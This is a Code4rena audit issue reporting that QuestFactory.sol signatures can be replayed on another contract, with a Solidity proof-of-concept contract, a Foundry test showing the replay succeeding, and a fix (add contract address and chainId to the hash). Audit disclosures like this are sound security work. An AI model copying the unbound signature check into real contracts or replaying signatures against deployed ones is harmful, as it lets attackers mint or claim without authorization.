Signature malleability in QuestFactory.sol #459

code423n4 · 2023-01-30T13:13:23Z

Lines of code

https://github.com/rabbitholegg/quest-protocol/blob/8c4c1f71221570b14a0479c216583342bd652d8d/contracts/QuestFactory.sol#L219-L229

Vulnerability details

Impact

https://github.com/rabbitholegg/quest-protocol/blob/8c4c1f71221570b14a0479c216583342bd652d8d/contracts/QuestFactory.sol#L219-L229
can be replay attack in another contract

Proof of Concept

     contract signer {

      // storage vars. Insert new vars at the end to keep the storage layout the same.
        struct Quest {
            mapping(address => bool) addressMinted;
            address questAddress;
            uint totalParticipants;
            uint numberMinted;
        }

        address public claimSignerAddress;
        address public protocolFeeRecipient;
        mapping(string => Quest) public quests;
        RabbitHoleReceipt public rabbitholeReceiptContract;
        mapping(address => bool) public rewardAllowlist;
        uint public questFee;
        uint public questIdCount;
        string questId = 'asdf';

        error QuestIdUsed();
        error OverMaxAllowedToMint();
        error AddressNotSigned();
        error AddressAlreadyMinted();
        error InvalidHash();
        error OnlyOwnerCanCreate1155Quest();
        error RewardNotAllowed();
        error QuestTypeInvalid();
        error AddressZeroNotAllowed();
        error QuestFeeTooHigh();

        event QuestCreated(address indexed creator, address indexed contractAddress, string indexed questId, string contractType, address rewardTokenAddress, uint256 endTime, uint256 startTime, uint256 totalParticipants, uint256 rewardAmountOrTokenId);
        event ReceiptMinted(address indexed recipient, string indexed questId);
      constructor (address _signer)
      {

        quests[questId].totalParticipants=10;//only test
        claimSignerAddress=_signer;

      }



      function mintReceipt(string memory questId_, bytes32 hash_, bytes32 r, bytes32 s,uint8 v) public {
            if (quests[questId_].numberMinted + 1 > quests[questId_].totalParticipants) revert OverMaxAllowedToMint();
            if (quests[questId_].addressMinted[msg.sender] == true) revert AddressAlreadyMinted();
            if (keccak256(abi.encodePacked(msg.sender, questId_)) != hash_) revert InvalidHash();
            //if (recoverSigner(hash_, signature_) != claimSignerAddress) revert AddressNotSigned();
            address  signer = ecrecover(hash_, v, r, s);
            if(signer != claimSignerAddress) revert AddressNotSigned();


            quests[questId_].addressMinted[msg.sender] = true;
            quests[questId_].numberMinted++;
            emit ReceiptMinted(msg.sender, questId_);
          // rabbitholeReceiptContract.mint(msg.sender, questId_);
        }
    }

here a contract with the function

      contract ContractTest_sing is DSTest{

      address alice;
      address user=address(1);
      string questId = 'asdf';
      bytes32 hash;
      address internal constant VM_ADDRESS = address(uint160(uint256(keccak256("hevm cheat code"))));
      Vm internal constant vm = Vm(VM_ADDRESS);
      signer public contract_sig;
        

        function testReplayAttaack() public{

              alice = vm.addr(1);

              hash = keccak256(abi.encodePacked(user,questId));

              (uint8 v, bytes32 r, bytes32 s) = vm.sign(1, hash);


              contract_sig=new signer(alice);//contract 
              vm.startPrank(user);
              contract_sig.mintReceipt(questId, hash,  r,  s, v);
              vm.expectRevert();
              contract_sig.mintReceipt(questId, hash,  r,  s, v);//same sig  at same contract 
              vm.stopPrank();

              contract_sig=new signer(alice);//contract 

              vm.startPrank(user);

              contract_sig.mintReceipt(questId, hash,  r,  s, v);//same sig on another  contract 
              vm.expectRevert();
              contract_sig.mintReceipt(questId, hash,  r,  s, v);//same sig at same contract 
              vm.stopPrank();

        }

      }

here test

    Running 1 test for test/quest.t.sol:ContractTest_sing
    [PASS] testReplayAttaack() (gas: 1038752)
    Test result: ok. 1 passed; 0 failed; finished in 4.83ms

Tools Used

manual review

Recommended Mitigation Steps

add at the hash the address of contract and chainId

The text was updated successfully, but these errors were encountered:

c4-judge · 2023-02-06T08:46:02Z

kirk-baird marked the issue as duplicate of #45

c4-judge · 2023-02-14T09:35:46Z

kirk-baird marked the issue as satisfactory

code423n4 added 2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working labels Jan 30, 2023

code423n4 added a commit that referenced this issue Jan 30, 2023

jesusrod15 issue #459

a0b9767

c4-judge closed this as completed Feb 6, 2023

c4-judge added the duplicate-45 label Feb 6, 2023

c4-judge added the satisfactory satisfies C4 submission criteria; eligible for awards label Feb 14, 2023

c4-judge added duplicate-107 and removed duplicate-45 labels Feb 14, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Signature malleability in QuestFactory.sol #459

Signature malleability in QuestFactory.sol #459

code423n4 commented Jan 30, 2023

c4-judge commented Feb 6, 2023

c4-judge commented Feb 14, 2023

Signature malleability in QuestFactory.sol #459

Signature malleability in QuestFactory.sol #459

Comments

code423n4 commented Jan 30, 2023

Lines of code

Vulnerability details

Impact

Proof of Concept

Tools Used

Recommended Mitigation Steps

c4-judge commented Feb 6, 2023

c4-judge commented Feb 14, 2023